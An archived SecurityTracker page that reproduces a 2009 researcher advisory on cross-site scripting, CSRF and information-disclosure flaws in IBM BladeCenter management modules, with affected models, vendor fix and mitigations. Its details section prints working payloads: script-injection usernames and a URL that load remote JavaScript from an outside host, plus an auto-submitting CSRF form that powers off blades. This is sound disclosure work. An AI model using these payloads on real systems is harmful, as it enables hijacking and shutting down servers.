SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Device (Embedded Server/Appliance)  >   IBM BladeCenter Vendors:   IBM
IBM BladeCenter Flaws Permit Cross-Site Scripting and Cross-Site Request Forgery Attacks
SecurityTracker Alert ID:  1022025
SecurityTracker URL:  http://securitytracker.com/id/1022025
CVE Reference:   CVE-2009-1288, CVE-2009-1289, CVE-2009-1290   (Links to External Site)
Updated:  Apr 15 2009
Original Entry Date:  Apr 9 2009
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  

Description:   Several vulnerabilities were reported in the IBM BladeCenter Advanced Management Module. A remote user can conduct cross-site scripting attacks. A remote user can conduct cross-site request forgery attacks. A remote authenticated user can view the security permissions of other operators.

The web management interface does not properly filter HTML code from user-supplied input before displaying the input on the event log page. A remote user can cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the IBM BladeCenter and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote authenticated operator with read-only privileges can view the security permissions of other users (e.g., access roles, scopes).

The web management interface does not validate the origin of HTTP requests. A remote user can exploit this to conduct cross-site request forgery attacks and take actions on the target interface acting as the target user.

The following devices are affected:

IBM BladeCenter E (1881, 7967, 8677)
IBM BladeCenter H (7989, 8852)
IBM BladeCenter HT (8740, 8750)
IBM BladeCenter S (1948, 8886)
IBM BladeCenter T (8720, 8730)
IBM BladeCenter JS12 (7998)
IBM BladeCenter JS21 (7988, 8844)
IBM BladeCenter JS22 (7998)
IBM BladeCenter HC10 (7996)
IBM BladeCenter HS12 (8014, 1916, 8028)
IBM BladeCenter HS20 (1883, 8843)
IBM BladeCenter HS21 (8853, 1885)
IBM BladeCenter HS21 XM (7995, 1915)
IBM BladeCenter LS20 (8850)
IBM BladeCenter LS21 (7971)
IBM BladeCenter LS41 (7972)
IBM BladeCenter QS21 (0792)
IBM BladeCenter QS22 (0793)

Henri Lindberg reported these vulnerabilities.

The original advisory is available at:

http://www.louhinetworks.fi/advisory/ibm_090409.txt

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the IBM BladeCenter software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can forge requests to take actions on the site acting as the target user.

A remote authenticated user can view the security permissions of other operators.

Solution:   The vendor has issued a fix.

The vendor's advisories are available at:

http://www-947.ibm.com/systems/support/supportsite.wss/docdisplay?lndocid=MIGR-5076204&brandind=5000020

http://www-947.ibm.com/systems/support/supportsite.wss/docdisplay?lndocid=MIGR-5076206&brandind=5000020

Vendor URL:  www.ibm.com/ (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  

Message History:   None.


 Source Message Contents

Date:  Thu, 09 Apr 2009 13:38:52 +0300
Subject:  IBM BladeCenter Advanced Management Module Multiple vulnerabilities


     Advisory: IBM BladeCenter Advanced Management Module
	       Multiple vulnerabilities
               (XSS type 2 & 1, CSRF, Information Disclosure)
 Release Date: 2009-04-09
Last Modified: 2009-04-09
      Authors: Henri Lindberg [henri.lindberg@louhi.fi], CISA
	
       Device: IBM BladeCenter H AMM
               Main application: BPET36H
               Released: 03-20-08
               Rev:  54
         Risk: Low - Moderate
               High if Web Access is in active use and
               access to login page is unrestricted
Vendor Status: Vendor notified, patch available.
   References: http://www.louhinetworks.fi/advisory/ibm_090409.txt

Affected devices (from vendor):
  IBM BladeCenter E (1881, 7967, 8677)
  IBM BladeCenter H (7989, 8852)
  IBM BladeCenter HT (8740, 8750)
  IBM BladeCenter S (1948, 8886)
  IBM BladeCenter T (8720, 8730)
  IBM BladeCenter JS12 (7998)
  IBM BladeCenter JS21 (7988, 8844)
  IBM BladeCenter JS22 (7998)
  IBM BladeCenter HC10 (7996)
  IBM BladeCenter HS12 (8014, 1916, 8028)
  IBM BladeCenter HS20 (1883, 8843)
  IBM BladeCenter HS21 (8853, 1885)
  IBM BladeCenter HS21 XM (7995, 1915)
  IBM BladeCenter LS20 (8850)
  IBM BladeCenter LS21 (7971)
  IBM BladeCenter LS41 (7972)
  IBM BladeCenter QS21 (0792)
  IBM BladeCenter QS22 (0793)

Overview:

   Quotes from

http://www-03.ibm.com/systems/bladecenter/hardware/chassis/bladeh/index.html

   "In today’s high-demand enterprise environment, organizations
    need a reliable infrastructure to run compute-intensive
    applications with minimal maintenance and downtime.
    IBM BladeCenter H is a powerful platform built with the
    enterprise customer in mind, providing industry-leading performance,
    innovative architecture and a solid foundation for virtualization."

   "Provides easy integration to promote innovation and help manage
    growth, complexity and risk"

   During a quick overview of BladeCenter AMM web access, it was
   discovered that web administration interface has multiple
   vulnerabilities regarding input and request validation.

Details:

   Cross Site Scripting
   ====================

   Type 2:
   -------
   Most serious issue discovered was the persistent XSS
   vulnerability on the event log page resulting from
   displaying unsanitized user input received from an invalid
   login attempt.

   This can be exploited without valid credentials or social
   engineering. Access to device administration IP address is
   needed and an administrator has to view event log at some point,
   however.

   Successful attack requires that an administrator visits event
   log page, thus enabling the attacker to control the chassis
   and blade configuration by running the injected content which
   is interpreted by the administrator's browser.

   For example, all blades can be shut down or new admnistrative
   users can be added, depending on administrator's access rights.

   Unsuccessful login attempts are displayed without HTML encoding
   or input sanitation in the event log. It is possible to inject
   a reference to a remote javascript file by using eg following
   username:
   </script><script src="//l7.fi"></script><script>

   Notes:
   If user input contains </script>, dynamic javascript is spilled
   out on the page and it is quite easy to mess up formatting
   of the event log page.

   Log can be cleared by an authenticated administrator from URL:
   http://1.2.3.4/private/clearlog

   Event log javascript format:
   parent.LogEntryArray[i++] = new LogEntry( "1","2","Audit
   ","SN#420420313370","09/09/08","04:20:42","Remote login failed
   for user '</script><script src='//l7.fi'></script><script>' from
   Web at IP 1.2.3.4");

   HTML-injection can be performed for example with following
   "username": <a href="private/clearlog">Mallory</a>

   This results in:
   <TD>Remote login failed for user '<a href='private/clearlog'>
   Mallory</a>' from Web at IP 1.2.3.4</TD>

   Entries from event log are also displayed on the AMM Service
   Data page.

   Type 1:
   -------
   File manager displays user input on the page "as is".

   Successful exploitation requires social engineering
   an authenticated administrator to visit the hostile URL.

   Example URL:
   http://1.2.3.4/private/file_management.ssi?
   PATH=/etc"><script%20src="http://l7.fi"></script>

   Information Disclosure
   ======================

   A readonly operator (for example, a Blade operator with
   a scope assigment to one Blade) can view security
   permissions of other users (access roles and scopes) by
   forcefully browsing to their respective login profile pages:

   http://1.2.3.4/private/login.ssi?WEBINDEX=<n>&JUNK=1
   where <n> is the assigned integer value (1..12) of the user
   account

   Cross Site Request Forgery
   ==========================

   BladeCenter AMM does not validate the origin of an HTTP request.

   If attacker is able to lure or force an authenticated
   administrator to view malicious content, the Advanced Management
   Module web administration interface can be controlled by
   submitting suitable forms. Attacker is then effectively acting
   as an administrator.

   Successful attack requires that the attacker knows the management
   interface address for the target device.

   As the management interface allows "No session timeout" option,
   user can be vulnerable to this attack even after closing a tab
   containing the management interface, if cached authentication
   is not cleared from browser.

   Proof of Concept:
   -----------------
   Example form (Powers off Blades 1-4):

   <html>
   <body onload="document.foobar.submit()">

   <form name="foobar" method="post"
   action="http://1.2.3.4/private/blade_power_action"
   style="display:none">
   <input name="COMMAND" value="6.3.2">
   <input name="STATE" value="0">
   <input name="CHECKED" value="15">
   <input name="selall" value="on">
   <input name="sel" value="bl1">
   <input name="sel" value="bl2">
   <input name="sel" value="bl3">
   <input name="sel" value="bl4">
   <input name="JUNK" value="1">

   </form>
   <body>
   </html>

Summary:

    Further research on BladeCenter AMM is strongly encouraged as
    this brief overview touched only the surface of the device.

    Management module supports a variety of networking protocols
    and contains features also from Telco version. These can be
    found by reading the commented HTML-code. One example feature is
    http://1.2.3.4/private/get_telco_system_health_summary

    It is also apparent that session timeout is not enforced.

More information:
http://www-947.ibm.com/systems/support/supportsite.wss/docdisplay?lndocid=MIGR-5076204&brandind=5000020
http://www-947.ibm.com/systems/support/supportsite.wss/docdisplay?lndocid=MIGR-5076206&brandind=5000020

Mitigation:

  * Do not use Web Access for configuring the chassis and blades.
  * Limit access to web administration interface.
  * Do not use "No session timeout" option.
  * Always logout and close all browser windows after performing
    administrative tasks.
  * Do not browse untrusted sites while performing administrative
    tasks
  * Only grant access to web administration to trusted users

Disclosure Timeline (highlights from the eight month effort):

    9. September 2008     - Contacted CERT-FI by email

   22. October   2008     - Provided IBM with a clarification
                            why SSL usage does not fix CSRF
                            vulnerability

    9. April     2009     - Advisory released


"Replicants are like any other machine. They're either a benefit
 or a hazard. If they're a benefit, it's not my problem."
 -- Rick Deckard

Copyright 2009 Louhi Networks Oy. All rights reserved. No warranties,
no liabilities, information provided 'as is' for educational purposes.
Reproduction allowed as long as credit is given. Information wants to
be free.

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC